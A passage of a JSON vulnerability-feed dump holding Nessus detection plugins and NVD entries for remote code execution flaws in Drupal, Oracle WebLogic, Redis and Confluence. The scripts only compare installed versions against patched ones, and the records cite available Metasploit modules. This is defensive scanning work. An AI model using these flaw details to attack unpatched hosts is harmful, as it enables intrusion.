(!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T17:51:42", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T14:24:59", "description": "A vulnerability in Oracle WebLogic Server 10.3.6.0.0 & 12.1.3.0.0 allows an unauthenticated attacker with HTTP access to the service to obtain arbitrary code execution due to an insecure deserialization.\n\nOracle proposes the associated patches on its site to fix the vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-19T00:00:00", "type": "nessus", "title": "Oracle WebLogic 10.3.6.0.0 / 12.1.3.0.0 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_112704", "href": "https://www.tenable.com/plugins/was/112704", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T15:10:05", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the WLS9-async component due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-26T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_CVE-2019-2725.NASL", "href": "https://www.tenable.com/plugins/nessus/124337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124337);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-2725\");\n script_bugtraq_id(108074);\n script_xref(name:\"IAVA\", value:\"2019-A-0128\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host\nis affected by a remote code execution vulnerability in the WLS9-async component\ndue to unsafe deserialization of XML encoded Java objects. An unauthenticated, \nremote attacker can exploit this, via a crafted Java object, to execute \narbitrary Java code in the context of the WebLogic server.\");\n # https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?95b9a80b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the Oracle Security Alert\nAdvisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\nwindows\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix_sets = [];\nextra = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n\nif (version =~ \"^12\\.1\\.3\\.\" && ver_compare(ver:version, fix:\"12.1.3.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '28710923', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '28710923', 'fix_adv' : '29792735'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29792736'},\n { 'fix_cpu' : '29633448', 'fix_adv' : '29633448'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '28710923 and 29694149 or 29204657 and 29694149 or 29633448\\n';\n}\nelse if (version =~ \"^10\\.3\\.6\\.\" && ver_compare(ver:version, fix:\"10.3.6.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '7HKN', 'fix_adv' : 'ICDZ'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : 'IL49'},\n { 'fix_cpu' : '7HKN', 'fix_adv' : '5H68'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : '6JJ4'},\n { 'fix_cpu' : 'MXLE', 'fix_adv' : 'MXLE'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '7HKN and ICDZ or U5I2 and IL49 or MXLE\\n';\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nforeach fix (fix_sets)\n{\n if( !isnull(install[fix['fix_cpu']]) && !isnull(install[fix['fix_adv']]) )\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n}\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version + \n '\\n Fix : ' + extra;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T15:10:25", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS9-async component due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-26T00:00:00", "type": "nessus", "title": "Oracle WebLogic WLS9-async Remote Code Execution (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_ASYNC_RESPONSE_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/124338", "sourceData": "Binary data weblogic_async_response_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T20:33:16", "description": "The remote Debian 10 / 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5081 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. (CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-02-21T00:00:00", "type": "nessus", "title": "Debian DSA-5081-1 : redis - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:redis", "p-cpe:/a:debian:debian_linux:redis-sentinel", "p-cpe:/a:debian:debian_linux:redis-server", "p-cpe:/a:debian:debian_linux:redis-tools", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5081.NASL", "href": "https://www.tenable.com/plugins/nessus/158200", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5081. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158200);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/28\");\n\n script_cve_id(\"CVE-2022-0543\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Debian DSA-5081-1 : redis - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 / 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5081\nadvisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a\n (Debian-specific) Lua sandbox escape, which could result in remote code execution. (CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/redis\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-0543\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/buster/redis\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/redis\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the redis packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 5\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Redis Lua Sandbox Escape');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-sentinel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(10)\\.[0-9]+|^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 10.0 / 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'redis', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-sentinel', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-server', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-tools', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '11.0', 'prefix': 'redis', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-sentinel', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-server', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-tools', 'reference': '5:6.0.16-1+deb11u2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redis / redis-sentinel / redis-server / redis-tools');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:18:19", "description": "The remote Ubuntu 20.04 LTS / 21.10 host has packages installed that are affected by a vulnerability as referenced in the USN-5316-1 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. (CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-03-08T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 21.10 : Redis vulnerability (USN-5316-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-28T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:21.10", "p-cpe:/a:canonical:ubuntu_linux:redis", "p-cpe:/a:canonical:ubuntu_linux:redis-sentinel", "p-cpe:/a:canonical:ubuntu_linux:redis-server", "p-cpe:/a:canonical:ubuntu_linux:redis-tools"], "id": "UBUNTU_USN-5316-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158688", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5316-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158688);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/28\");\n\n script_cve_id(\"CVE-2022-0543\");\n script_xref(name:\"USN\", value:\"5316-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 21.10 : Redis vulnerability (USN-5316-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 21.10 host has packages installed that are affected by a vulnerability as referenced in\nthe USN-5316-1 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a\n (Debian-specific) Lua sandbox escape, which could result in remote code execution. (CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5316-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Redis Lua Sandbox Escape');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-sentinel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:redis-tools\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022 Canonical, Inc. / NASL script (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(20\\.04|21\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 21.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'redis', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-sentinel', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-server', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'redis-tools', 'pkgver': '5:5.0.7-2ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-sentinel', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-server', 'pkgver': '5:6.0.15-1ubuntu0.1'},\n {'osver': '21.10', 'pkgname': 'redis-tools', 'pkgver': '5:6.0.15-1ubuntu0.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redis / redis-sentinel / redis-server / redis-tools');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:18:26", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-10T17:24:19", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-06-10T14:26:00", "cpe": [], "id": "CVE-2021-26084", "href": 